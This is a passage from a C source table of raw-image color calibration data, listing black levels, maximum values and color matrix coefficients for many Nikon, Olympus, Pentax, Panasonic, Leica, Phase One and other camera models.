{ 8598,-2848,-857,-5618,13606,2195,-1002,1773,7137 } },
{ "Nikon D4", 0, 0,
{ 8598,-2848,-857,-5618,13606,2195,-1002,1773,7137 } },
{ "Nikon Df", 0, 0,
{ 8598,-2848,-857,-5618,13606,2195,-1002,1773,7137 } },
{ "Nikon D5000", 0, 0xf00,
{ 7309,-1403,-519,-8474,16008,2622,-2433,2826,8064 } },
{ "Nikon D5100", 0, 0x3de6,
{ 8198,-2239,-724,-4871,12389,2798,-1043,2050,7181 } },
{ "Nikon D5200", 0, 0,
{ 8322,-3112,-1047,-6367,14342,2179,-988,1638,6394 } },
{ "Nikon D5300", 0, 0,
{ 6988,-1384,-714,-5631,13410,2447,-1485,2204,7318 } },
{ "Nikon D5500", 0, 0,
{ 8821,-2938,-785,-4178,12142,2287,-824,1651,6860 } },
{ "Nikon D500", 0, 0,
{ 8813,-3210,-1036,-4703,12868,2021,-1054,1940,6129 } },
{ "Nikon D50", 0, 0,
{ 7732,-2422,-789,-8238,15884,2498,-859,783,7330 } },
{ "Nikon D5", 0, 0,
{ 9200,-3522,-992,-5755,13803,2117,-753,1486,6338 } },
{ "Nikon D600", 0, 0x3e07,
{ 8178,-2245,-609,-4857,12394,2776,-1207,2086,7298 } },
{ "Nikon D610",0, 0,
{ 10426,-4005,-444,-3565,11764,1403,-1206,2266,6549 } },
{ "Nikon D60", 0, 0,
{ 8736,-2458,-935,-9075,16894,2251,-1354,1242,8263 } },
{ "Nikon D7000", 0, 0,
{ 8198,-2239,-724,-4871,12389,2798,-1043,2050,7181 } },
{ "Nikon D7100", 0, 0,
{ 8322,-3112,-1047,-6367,14342,2179,-988,1638,6394 } },
{ "Nikon D7200", 0, 0,
{ 8322,-3112,-1047,-6367,14342,2179,-988,1638,6394 } },
{ "Nikon D750", -600, 0,
{ 9020,-2890,-715,-4535,12436,2348,-934,1919,7086 } },
{ "Nikon D700", 0, 0,
{ 8139,-2171,-663,-8747,16541,2295,-1925,2008,8093 } },
{ "Nikon D70", 0, 0,
{ 7732,-2422,-789,-8238,15884,2498,-859,783,7330 } },
{ "Nikon D810A", 0, 0,
{ 11973, -5685, -888, -1965, 10326, 1901, -115, 1123, 7169 } },
{ "Nikon D810", 0, 0,
{ 9369,-3195,-791,-4488,12430,2301,-893,1796,6872 } },
{ "Nikon D800", 0, 0,
{ 7866,-2108,-555,-4869,12483,2681,-1176,2069,7501 } },
{ "Nikon D80", 0, 0,
{ 8629,-2410,-883,-9055,16940,2171,-1490,1363,8520 } },
{ "Nikon D90", 0, 0xf00,
{ 7309,-1403,-519,-8474,16008,2622,-2434,2826,8064 } },
{ "Nikon E700", 0, 0x3dd, /* DJC */
{ -3746,10611,1665,9621,-1734,2114,-2389,7082,3064,3406,6116,-244 } },
{ "Nikon E800", 0, 0x3dd, /* DJC */
{ -3746,10611,1665,9621,-1734,2114,-2389,7082,3064,3406,6116,-244 } },
{ "Nikon E950", 0, 0x3dd, /* DJC */
{ -3746,10611,1665,9621,-1734,2114,-2389,7082,3064,3406,6116,-244 } },
{ "Nikon E995", 0, 0, /* copied from E5000 */
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E2100", 0, 0, /* copied from Z2, new white balance */
{ 13142,-4152,-1596,-4655,12374,2282,-1769,2696,6711 } },
{ "Nikon E2500", 0, 0,
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E3200", 0, 0, /* DJC */
{ 9846,-2085,-1019,-3278,11109,2170,-774,2134,5745 } },
{ "Nikon E4300", 0, 0, /* copied from Minolta DiMAGE Z2 */
{ 11280,-3564,-1370,-4655,12374,2282,-1423,2168,5396 } },
{ "Nikon E4500", 0, 0,
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E5000", 0, 0,
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E5400", 0, 0,
{ 9349,-2987,-1001,-7919,15766,2266,-2098,2680,6839 } },
{ "Nikon E5700", 0, 0,
{ -5368,11478,2368,5537,-113,3148,-4969,10021,5782,778,9028,211 } },
{ "Nikon E8400", 0, 0,
{ 7842,-2320,-992,-8154,15718,2599,-1098,1342,7560 } },
{ "Nikon E8700", 0, 0,
{ 8489,-2583,-1036,-8051,15583,2643,-1307,1407,7354 } },
{ "Nikon E8800", 0, 0,
{ 7971,-2314,-913,-8451,15762,2894,-1442,1520,7610 } },
{ "Nikon COOLPIX A", 0, 0,
{ 8198,-2239,-724,-4871,12389,2798,-1043,2050,7181 } },
{ "Nikon COOLPIX B700", 0, 0,
{ 14387,-6014,-1299,-1357,9975,1616,467,1047,4744 } },
{ "Nikon COOLPIX P330", -200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon COOLPIX P340", -200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon COOLPIX P6000", 0, 0,
{ 9698,-3367,-914,-4706,12584,2368,-837,968,5801 } },
{ "Nikon COOLPIX P7000", 0, 0,
{ 11432,-3679,-1111,-3169,11239,2202,-791,1380,4455 } },
{ "Nikon COOLPIX P7100", 0, 0,
{ 11053,-4269,-1024,-1976,10182,2088,-526,1263,4469 } },
{ "Nikon COOLPIX P7700", -3200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon COOLPIX P7800", -3200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon 1 V3", -200, 0,
{ 5958,-1559,-571,-4021,11453,2939,-634,1548,5087 } },
{ "Nikon 1 J4", 0, 0,
{ 5958,-1559,-571,-4021,11453,2939,-634,1548,5087 } },
{ "Nikon 1 J5", 0, 0,
{ 7520,-2518,-645,-3844,12102,1945,-913,2249,6835} },
{ "Nikon 1 S2", -200, 0,
{ 6612,-1342,-618,-3338,11055,2623,-174,1792,5075 } },
{ "Nikon 1 V2", 0, 0,
{ 6588,-1305,-693,-3277,10987,2634,-355,2016,5106 } },
{ "Nikon 1 J3", 0, 0,
{ 8144,-2671,-473,-1740,9834,1601,-58,1971,4296 } },
{ "Nikon 1 AW1", 0, 0,
{ 6588,-1305,-693,-3277,10987,2634,-355,2016,5106 } },
{ "Nikon 1 ", 0, 0, /* J1, J2, S1, V1 */
{ 8994,-2667,-865,-4594,12324,2552,-699,1786,6260 } },
{ "Olympus AIR-A01", 0, 0xfe1,
{ 8992,-3093,-639,-2563,10721,2122,-437,1270,5473 } },
{ "Olympus C5050", 0, 0,
{ 10508,-3124,-1273,-6079,14294,1901,-1653,2306,6237 } },
{ "Olympus C5060", 0, 0,
{ 10445,-3362,-1307,-7662,15690,2058,-1135,1176,7602 } },
{ "Olympus C7070", 0, 0,
{ 10252,-3531,-1095,-7114,14850,2436,-1451,1723,6365 } },
{ "Olympus C70", 0, 0,
{ 10793,-3791,-1146,-7498,15177,2488,-1390,1577,7321 } },
{ "Olympus C80", 0, 0,
{ 8606,-2509,-1014,-8238,15714,2703,-942,979,7760 } },
{ "Olympus E-10", 0, 0xffc,
{ 12745,-4500,-1416,-6062,14542,1580,-1934,2256,6603 } },
{ "Olympus E-1", 0, 0,
{ 11846,-4767,-945,-7027,15878,1089,-2699,4122,8311 } },
{ "Olympus E-20", 0, 0xffc,
{ 13173,-4732,-1499,-5807,14036,1895,-2045,2452,7142 } },
{ "Olympus E-300", 0, 0,
{ 7828,-1761,-348,-5788,14071,1830,-2853,4518,6557 } },
{ "Olympus E-330", 0, 0,
{ 8961,-2473,-1084,-7979,15990,2067,-2319,3035,8249 } },
{ "Olympus E-30", 0, 0xfbc,
{ 8144,-1861,-1111,-7763,15894,1929,-1865,2542,7607 } },
{ "Olympus E-3", 0, 0xf99,
{ 9487,-2875,-1115,-7533,15606,2010,-1618,2100,7389 } },
{ "Olympus E-400", 0, 0,
{ 6169,-1483,-21,-7107,14761,2536,-2904,3580,8568 } },
{ "Olympus E-410", 0, 0xf6a,
{ 8856,-2582,-1026,-7761,15766,2082,-2009,2575,7469 } },
{ "Olympus E-420", 0, 0xfd7,
{ 8746,-2425,-1095,-7594,15612,2073,-1780,2309,7416 } },
{ "Olympus E-450", 0, 0xfd2,
{ 8745,-2425,-1095,-7594,15613,2073,-1780,2309,7416 } },
{ "Olympus E-500", 0, 0,
{ 8136,-1968,-299,-5481,13742,1871,-2556,4205,6630 } },
{ "Olympus E-510", 0, 0xf6a,
{ 8785,-2529,-1033,-7639,15624,2112,-1783,2300,7817 } },
{ "Olympus E-520", 0, 0xfd2,
{ 8344,-2322,-1020,-7596,15635,2048,-1748,2269,7287 } },
{ "Olympus E-5", 0, 0xeec,
{ 11200,-3783,-1325,-4576,12593,2206,-695,1742,7504 } },
{ "Olympus E-600", 0, 0xfaf,
{ 8453,-2198,-1092,-7609,15681,2008,-1725,2337,7824 } },
{ "Olympus E-620", 0, 0xfaf,
{ 8453,-2198,-1092,-7609,15681,2008,-1725,2337,7824 } },
{ "Olympus E-P1", 0, 0xffd,
{ 8343,-2050,-1021,-7715,15705,2103,-1831,2380,8235 } },
{ "Olympus E-P2", 0, 0xffd,
{ 8343,-2050,-1021,-7715,15705,2103,-1831,2380,8235 } },
{ "Olympus E-P3", 0, 0,
{ 7575,-2159,-571,-3722,11341,2725,-1434,2819,6271 } },
{ "Olympus E-P5", 0, 0,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-PL1s", 0, 0,
{ 11409,-3872,-1393,-4572,12757,2003,-709,1810,7415 } },
{ "Olympus E-PL1", 0, 0,
{ 11408,-4289,-1215,-4286,12385,2118,-387,1467,7787 } },
{ "Olympus E-PL2", 0, 0xcf3,
{ 15030,-5552,-1806,-3987,12387,1767,-592,1670,7023 } },
{ "Olympus E-PL3", 0, 0,
{ 7575,-2159,-571,-3722,11341,2725,-1434,2819,6271 } },
{ "Olympus E-PL5", 0, 0xfcb,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-PL6", 0, 0,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-PL7", 0, 0,
{ 9197,-3190,-659,-2606,10830,2039,-458,1250,5458 } },
{ "Olympus E-PL8", 0, 0,
{ 9197,-3190,-659,-2606,10830,2039,-458,1250,5458 } },
{ "Olympus E-PM1", 0, 0,
{ 7575,-2159,-571,-3722,11341,2725,-1434,2819,6271 } },
{ "Olympus E-PM2", 0, 0,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-M10", 0, 0, /* Same for E-M10MarkII */
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-M1MarkII", 0, 0, /* Adobe */
{ 8380, -2630, -639, -2887, 10725, 2496, -627, 1427, 5438 }},
{ "Olympus E-M1", 0, 0,
{ 7687,-1984,-606,-4327,11928,2721,-1381,2339,6452 } },
{ "Olympus E-M5MarkII", 0, 0,
{ 9422,-3258,-711,-2655,10898,2015,-512,1354,5512 } },
{ "Olympus E-M5", 0, 0xfe1,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus PEN-F",0, 0,
{ 9476,-3182,-765,-2613,10958,1893,-449,1315,5268 } },
{ "Olympus SP350", 0, 0,
{ 12078,-4836,-1069,-6671,14306,2578,-786,939,7418 } },
{ "Olympus SP3", 0, 0,
{ 11766,-4445,-1067,-6901,14421,2707,-1029,1217,7572 } },
{ "Olympus SP500UZ", 0, 0xfff,
{ 9493,-3415,-666,-5211,12334,3260,-1548,2262,6482 } },
{ "Olympus SP510UZ", 0, 0xffe,
{ 10593,-3607,-1010,-5881,13127,3084,-1200,1805,6721 } },
{ "Olympus SP550UZ", 0, 0xffe,
{ 11597,-4006,-1049,-5432,12799,2957,-1029,1750,6516 } },
{ "Olympus SP560UZ", 0, 0xff9,
{ 10915,-3677,-982,-5587,12986,2911,-1168,1968,6223 } },
{ "Olympus SP570UZ", 0, 0,
{ 11522,-4044,-1146,-4736,12172,2904,-988,1829,6039 } },
{ "Olympus SH-2", 0, 0,
{ 10156,-3425,-1077,-2611,11177,1624,-385,1592,5080 } },
{ "Olympus SH-3", 0, 0, /* Alias of SH-2 */
{ 10156,-3425,-1077,-2611,11177,1624,-385,1592,5080 } },
{ "Olympus STYLUS1",0, 0,
{ 11976,-5518,-545,-1419,10472,846,-475,1766,4524 } },
{ "Olympus TG-4", 0, 0,
{ 11426,-4159,-1126,-2066,10678,1593,-120,1327,4998 } },
{ "Olympus XZ-10", 0, 0,
{ 9777,-3483,-925,-2886,11297,1800,-602,1663,5134 } },
{ "Olympus XZ-1", 0, 0,
{ 10901,-4095,-1074,-1141,9208,2293,-62,1417,5158 } },
{ "Olympus XZ-2", 0, 0,
{ 9777,-3483,-925,-2886,11297,1800,-602,1663,5134 } },
{ "OmniVision", 16, 0x3ff,
{ 12782,-4059,-379,-478,9066,1413,1340,1513,5176 } }, /* DJC */
{ "Pentax *ist DL2", 0, 0,
{ 10504,-2438,-1189,-8603,16207,2531,-1022,863,12242 } },
{ "Pentax *ist DL", 0, 0,
{ 10829,-2838,-1115,-8339,15817,2696,-837,680,11939 } },
{ "Pentax *ist DS2", 0, 0,
{ 10504,-2438,-1189,-8603,16207,2531,-1022,863,12242 } },
{ "Pentax *ist DS", 0, 0,
{ 10371,-2333,-1206,-8688,16231,2602,-1230,1116,11282 } },
{ "Pentax *ist D", 0, 0,
{ 9651,-2059,-1189,-8881,16512,2487,-1460,1345,10687 } },
{ "Pentax K10D", 0, 0,
{ 9566,-2863,-803,-7170,15172,2112,-818,803,9705 } },
{ "Pentax K1", 0, 0,
{ 11095,-3157,-1324,-8377,15834,2720,-1108,947,11688 } },
{ "Pentax K20D", 0, 0,
{ 9427,-2714,-868,-7493,16092,1373,-2199,3264,7180 } },
{ "Pentax K200D", 0, 0,
{ 9186,-2678,-907,-8693,16517,2260,-1129,1094,8524 } },
{ "Pentax K2000", 0, 0,
{ 11057,-3604,-1155,-5152,13046,2329,-282,375,8104 } },
{ "Pentax K-m", 0, 0,
{ 11057,-3604,-1155,-5152,13046,2329,-282,375,8104 } },
{ "Pentax K-x", 0, 0,
{ 8843,-2837,-625,-5025,12644,2668,-411,1234,7410 } },
{ "Pentax K-r", 0, 0,
{ 9895,-3077,-850,-5304,13035,2521,-883,1768,6936 } },
{ "Pentax K-1", 0, 0,
{ 8566,-2746,-1201,-3612,12204,1550,-893,1680,6264 } },
{ "Pentax K-30", 0, 0,
{ 8710,-2632,-1167,-3995,12301,1881,-981,1719,6535 } },
{ "Pentax K-3 II", 0, 0,
{ 8626,-2607,-1155,-3995,12301,1881,-1039,1822,6925 } },
{ "Pentax K-3", 0, 0,
{ 7415,-2052,-721,-5186,12788,2682,-1446,2157,6773 } },
{ "Pentax K-5 II", 0, 0,
{ 8170,-2725,-639,-4440,12017,2744,-771,1465,6599 } },
{ "Pentax K-5", 0, 0,
{ 8713,-2833,-743,-4342,11900,2772,-722,1543,6247 } },
{ "Pentax K-70", 0, 0,
{8766, -3149, -747, -3976, 11943, 2292, -517, 1259, 5552 }},
{ "Pentax K-7", 0, 0,
{ 9142,-2947,-678,-8648,16967,1663,-2224,2898,8615 } },
{ "Pentax K-S1", 0, 0,
{ 8512,-3211,-787,-4167,11966,2487,-638,1288,6054 } },
{ "Pentax K-S2", 0, 0,
{ 8662,-3280,-798,-3928,11771,2444,-586,1232,6054 } },
{ "Pentax Q-S1", 0, 0,
{ 12995,-5593,-1107,-1879,10139,2027,-64,1233,4919 } },
{ "Pentax MX-1", 0, 0,
{ 8804,-2523,-1238,-2423,11627,860,-682,1774,4753 } },
{ "Pentax Q10", 0, 0,
{ 12995,-5593,-1107,-1879,10139,2027,-64,1233,4919 } },
{ "Pentax 645D", 0, 0x3e00,
{ 10646,-3593,-1158,-3329,11699,1831,-667,2874,6287 } },
{ "Pentax 645Z", 0, 0, /* Adobe */
{ 9702, -3060, -1254, -3685, 12133, 1721, -1086, 2010, 6971}},
{ "Panasonic DMC-CM10", -15, 0,
{ 8770, -3194,-820,-2871,11281,1803,-513,1552,4434 } },
{ "Panasonic DMC-CM1", -15, 0,
{ 8770, -3194,-820,-2871,11281,1803,-513,1552,4434 } },
{ "Panasonic DMC-FZ8", 0, 0xf7f,
{ 8986,-2755,-802,-6341,13575,3077,-1476,2144,6379 } },
{ "Panasonic DMC-FZ18", 0, 0,
{ 9932,-3060,-935,-5809,13331,2753,-1267,2155,5575 } },
{ "Panasonic DMC-FZ28", -15, 0xf96,
{ 10109,-3488,-993,-5412,12812,2916,-1305,2140,5543 } },
{ "Panasonic DMC-FZ300", -15, 0xfff,
{ 8378,-2798,-769,-3068,11410,1877,-538,1792,4623 } },
{ "Panasonic DMC-FZ330", -15, 0xfff, // same as FZ300
{ 8378,-2798,-769,-3068,11410,1877,-538,1792,4623 } },
{ "Panasonic DMC-FZ30", 0, 0xf94,
{ 10976,-4029,-1141,-7918,15491,2600,-1670,2071,8246 } },
{ "Panasonic DMC-FZ3", -15, 0,
{ 9938,-2780,-890,-4604,12393,2480,-1117,2304,4620 } },
{ "Panasonic DMC-FZ4", -15, 0,
{ 13639,-5535,-1371,-1698,9633,2430,316,1152,4108 } },
{ "Panasonic DMC-FZ50", 0, 0,
{ 7906,-2709,-594,-6231,13351,3220,-1922,2631,6537 } },
{ "Panasonic DMC-FZ7", -15, 0,
{ 11532,-4324,-1066,-2375,10847,1749,-564,1699,4351 } },
{ "Leica V-LUX1", 0, 0,
{ 7906,-2709,-594,-6231,13351,3220,-1922,2631,6537 } },
{ "Panasonic DMC-L10", -15, 0xf96,
{ 8025,-1942,-1050,-7920,15904,2100,-2456,3005,7039 } },
{ "Panasonic DMC-L1", 0, 0xf7f,
{ 8054,-1885,-1025,-8349,16367,2040,-2805,3542,7629 } },
{ "Leica DIGILUX 3", 0, 0xf7f,
{ 8054,-1885,-1025,-8349,16367,2040,-2805,3542,7629 } },
{ "Panasonic DMC-LC1", 0, 0,
{ 11340,-4069,-1275,-7555,15266,2448,-2960,3426,7685 } },
{ "Leica DIGILUX 2", 0, 0,
{ 11340,-4069,-1275,-7555,15266,2448,-2960,3426,7685 } },
{ "Panasonic DMC-LX100", -15, 0,
{ 8844,-3538,-768,-3709,11762,2200,-698,1792,5220 } },
{ "Leica D-LUX (Typ 109)", -15, 0,
{ 8844,-3538,-768,-3709,11762,2200,-698,1792,5220 } },
{ "Panasonic DMC-LF1", -15, 0,
{ 9379,-3267,-816,-3227,11560,1881,-926,1928,5340 } },
{ "Leica C (Typ 112)", -15, 0,
{ 9379,-3267,-816,-3227,11560,1881,-926,1928,5340 } },
{ "Panasonic DMC-LX9", -15, 0, /* markets: LX9 LX10 LX15 */
{ 7790, -2736, -755, -3452, 11870, 1769, -628, 1647, 4898 }}, /* Adobe*/
{ "Panasonic DMC-LX10", -15, 0, /* markets: LX9 LX10 LX15 */
{ 7790, -2736, -755, -3452, 11870, 1769, -628, 1647, 4898 }}, /* Adobe*/
{ "Panasonic DMC-LX15", -15, 0, /* markets: LX9 LX10 LX15 */
{ 7790, -2736, -755, -3452, 11870, 1769, -628, 1647, 4898 }}, /* Adobe*/
{ "Panasonic DMC-LX1", 0, 0xf7f,
{ 10704,-4187,-1230,-8314,15952,2501,-920,945,8927 } },
{ "Leica D-Lux (Typ 109)", 0, 0xf7f,
{ 8844,-3538,-768,-3709,11762,2200,-698,1792,5220 } },
{ "Leica D-LUX2", 0, 0xf7f,
{ 10704,-4187,-1230,-8314,15952,2501,-920,945,8927 } },
{ "Panasonic DMC-LX2", 0, 0,
{ 8048,-2810,-623,-6450,13519,3272,-1700,2146,7049 } },
{ "Leica D-LUX3", 0, 0,
{ 8048,-2810,-623,-6450,13519,3272,-1700,2146,7049 } },
{ "Panasonic DMC-LX3", -15, 0,
{ 8128,-2668,-655,-6134,13307,3161,-1782,2568,6083 } },
{ "Leica D-LUX 4", -15, 0,
{ 8128,-2668,-655,-6134,13307,3161,-1782,2568,6083 } },
{ "Panasonic DMC-LX5", -15, 0,
{ 10909,-4295,-948,-1333,9306,2399,22,1738,4582 } },
{ "Leica D-LUX 5", -15, 0,
{ 10909,-4295,-948,-1333,9306,2399,22,1738,4582 } },
{ "Panasonic DMC-LX7", -15, 0,
{ 10148,-3743,-991,-2837,11366,1659,-701,1893,4899 } },
{ "Leica D-LUX 6", -15, 0,
{ 10148,-3743,-991,-2837,11366,1659,-701,1893,4899 } },
{ "Panasonic DMC-FZ1000", -15, 0,
{ 7830,-2696,-763,-3325,11667,1866,-641,1712,4824 } },
{ "Leica V-LUX (Typ 114)", 15, 0,
{ 7830,-2696,-763,-3325,11667,1866,-641,1712,4824 } },
{ "Panasonic DMC-FZ100", -15, 0xfff,
{ 16197,-6146,-1761,-2393,10765,1869,366,2238,5248 } },
{ "Leica V-LUX 2", -15, 0xfff,
{ 16197,-6146,-1761,-2393,10765,1869,366,2238,5248 } },
{ "Panasonic DMC-FZ150", -15, 0xfff,
{ 11904,-4541,-1189,-2355,10899,1662,-296,1586,4289 } },
{ "Leica V-LUX 3", -15, 0xfff,
{ 11904,-4541,-1189,-2355,10899,1662,-296,1586,4289 } },
{ "Panasonic DMC-FZ2000", -15, 0, /* markets: DMC-FZ2000,DMC-FZ2500,FZH1 */
{ 7386, -2443, -743, -3437, 11864, 1757, -608, 1660, 4766 }},
{ "Panasonic DMC-FZ2500", -15, 0,
{ 7386, -2443, -743, -3437, 11864, 1757, -608, 1660, 4766 }},
{ "Panasonic DMC-FZH1", -15, 0,
{ 7386, -2443, -743, -3437, 11864, 1757, -608, 1660, 4766 }},
{ "Panasonic DMC-FZ200", -15, 0xfff,
{ 8112,-2563,-740,-3730,11784,2197,-941,2075,4933 } },
{ "Leica V-LUX 4", -15, 0xfff,
{ 8112,-2563,-740,-3730,11784,2197,-941,2075,4933 } },
{ "Panasonic DMC-FX150", -15, 0xfff,
{ 9082,-2907,-925,-6119,13377,3058,-1797,2641,5609 } },
{ "Panasonic DMC-G10", 0, 0,
{ 10113,-3400,-1114,-4765,12683,2317,-377,1437,6710 } },
{ "Panasonic DMC-G1", -15, 0xf94,
{ 8199,-2065,-1056,-8124,16156,2033,-2458,3022,7220 } },
{ "Panasonic DMC-G2", -15, 0xf3c,
{ 10113,-3400,-1114,-4765,12683,2317,-377,1437,6710 } },
{ "Panasonic DMC-G3", -15, 0xfff,
{ 6763,-1919,-863,-3868,11515,2684,-1216,2387,5879 } },
{ "Panasonic DMC-G5", -15, 0xfff,
{ 7798,-2562,-740,-3879,11584,2613,-1055,2248,5434 } },
{ "Panasonic DMC-G6", -15, 0xfff,
{ 8294,-2891,-651,-3869,11590,2595,-1183,2267,5352 } },
{ "Panasonic DMC-G7", -15, 0xfff,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-G8", -15, 0xfff, /* markets: DMC-G8, DMC-G80, DMC-G81, DMC-G85 */
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GF1", -15, 0xf92,
{ 7888,-1902,-1011,-8106,16085,2099,-2353,2866,7330 } },
{ "Panasonic DMC-GF2", -15, 0xfff,
{ 7888,-1902,-1011,-8106,16085,2099,-2353,2866,7330 } },
{ "Panasonic DMC-GF3", -15, 0xfff,
{ 9051,-2468,-1204,-5212,13276,2121,-1197,2510,6890 } },
{ "Panasonic DMC-GF5", -15, 0xfff,
{ 8228,-2945,-660,-3938,11792,2430,-1094,2278,5793 } },
{ "Panasonic DMC-GF6", -15, 0,
{ 8130,-2801,-946,-3520,11289,2552,-1314,2511,5791 } },
{ "Panasonic DMC-GF7", -15, 0,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GF8", -15, 0,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GH1", -15, 0xf92,
{ 6299,-1466,-532,-6535,13852,2969,-2331,3112,5984 } },
{ "Panasonic DMC-GH2", -15, 0xf95,
{ 7780,-2410,-806,-3913,11724,2484,-1018,2390,5298 } },
{ "Panasonic DMC-GH3", -15, 0,
{ 6559,-1752,-491,-3672,11407,2586,-962,1875,5130 } },
{ "Panasonic DMC-GH4", -15, 0,
{ 7122,-2108,-512,-3155,11201,2231,-541,1423,5045 } },
{ "Yuneec CGO4", -15, 0,
{ 7122,-2108,-512,-3155,11201,2231,-541,1423,5045 } },
{ "Panasonic DMC-GM1", -15, 0,
{ 6770,-1895,-744,-5232,13145,2303,-1664,2691,5703 } },
{ "Panasonic DMC-GM5", -15, 0,
{ 8238,-3244,-679,-3921,11814,2384,-836,2022,5852 } },
{ "Panasonic DMC-GX1", -15, 0,
{ 6763,-1919,-863,-3868,11515,2684,-1216,2387,5879 } },
{ "Panasonic DMC-GX85", -15, 0, /* markets: GX85 GX80 GX7MK2 */
{ 7771,-3020,-629,4029,11950,2345,-821,1977,6119 } },
{ "Panasonic DMC-GX80", -15, 0, /* markets: GX85 GX80 GX7MK2 */
{ 7771,-3020,-629,4029,11950,2345,-821,1977,6119 } },
{ "Panasonic DMC-GX7MK2", -15, 0, /* markets: GX85 GX80 GX7MK2 */
{ 7771,-3020,-629,4029,11950,2345,-821,1977,6119 } },
{ "Panasonic DMC-GX7", -15,0,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GX8", -15,0,
{ 7564,-2263,-606,-3148,11239,2177,-540,1435,4853 } },
{ "Panasonic DMC-TZ6", -15, 0, /* markets: ZS40 TZ60 TZ61 */
{ 8607,-2822,-808,-3755,11930,2049,-820,2060,5224 } },
{ "Panasonic DMC-TZ8", -15, 0, /* markets: ZS60 TZ80 TZ81 TZ85 */
{ 8550,-2908,-842,-3195,11529,1881,-338,1603,4631 } },
{ "Panasonic DMC-ZS4", -15, 0, /* markets: ZS40 TZ60 TZ61 */
{ 8607,-2822,-808,-3755,11930,2049,-820,2060,5224 } },
{ "Panasonic DMC-TZ7", -15, 0, /* markets: ZS50 TZ70 TZ71 */
{ 8802,-3135,-789,-3151,11468,1904,-550,1745,4810 } },
{ "Panasonic DMC-ZS5", -15, 0, /* markets: ZS50 TZ70 TZ71 */
{ 8802,-3135,-789,-3151,11468,1904,-550,1745,4810 } },
{ "Panasonic DMC-ZS6", -15, 0, /* markets: ZS60 TZ80 TZ81 TZ85 */
{ 8550,-2908,-842,-3195,11529,1881,-338,1603,4631 } },
{ "Panasonic DMC-ZS100", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-ZS110", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TZ100", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TZ101", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TZ110", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TX1", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Leica S (Typ 007)", 0, 0,
{ 6063,-2234,-231,-5210,13787,1500,-1043,2866,6997 } },
{ "Leica X", 0, 0, /* X and X-U, both (Typ 113) */
{ 7712,-2059,-653,-3882,11494,2726,-710,1332,5958 } },
{ "Leica Q (Typ 116)", 0, 0,
{ 11865,-4523,-1441,-5423,14458,935,-1587,2687,4830 } },
{ "Leica M (Typ 262)", 0, 0,
{ 6653,-1486,-611,-4221,13303,929,-881,2416,7226 } },
{ "Leica SL (Typ 601)", 0, 0,
{ 11865,-4523,-1441,-5423,14458,935,-1587,2687,4830} },
{ "Phase One H 20", 0, 0, /* DJC */
{ 1313,1855,-109,-6715,15908,808,-327,1840,6020 } },
{ "Phase One H 25", 0, 0,
{ 2905,732,-237,-8134,16626,1476,-3038,4253,7517 } },
{ "Phase One IQ250",0, 0,
{ 4396,-153,-249,-5267,12249,2657,-1397,2323,6014 } },
{ "Phase One P 2", 0, 0,
{ 2905,732,-237,-8134,16626,1476,-3038,4253,7517 } },
{ "Phase One P 30", 0, 0,
{ 4516,-245,-37,-7020,14976,2173,-3206,4671,7087 } },
{ "Phase One P 45", 0, 0,
{ 5053,-24,-117,-5684,14076,1702,-2619,4492,5849 } },
{ "Phase One P40", 0, 0,
{ 8035,435,-962,-6001,13872,2320,-1159,3065,5434 } },
{ "Phase One P65", 0, 0,
{ 8035,435,-962,-6001,13872,2320,-1159,3065,5434 } },
{ "Photron BC2-HD", 0, 0, /* DJC */
{ 14603,-4122,-528,-1810,9794,2017,-297,2763,5936 } },
{ "Red One", 704, 0xffff, /* DJC */
{ 21014,-7891,-2613,-3056,12201,856,-2203,5125,8042 } },
{ "Ricoh GR II", 0, 0,
{ 4630,-834,-423,-4977,12805,2417,-638,1467,6115 } },
{ "Ricoh GR", 0, 0,
{ 3708,-543,-160,-5381,12254,3556,-1471,1929,8234 } },
{ "Samsung EK-GN120", 0, 0, /* Adobe; Galaxy NX */
{ 7557,-2522,-739,-4679,12949,1894,-840,1777,5311 } },
{ "Samsung EX1", 0, 0x3e00,
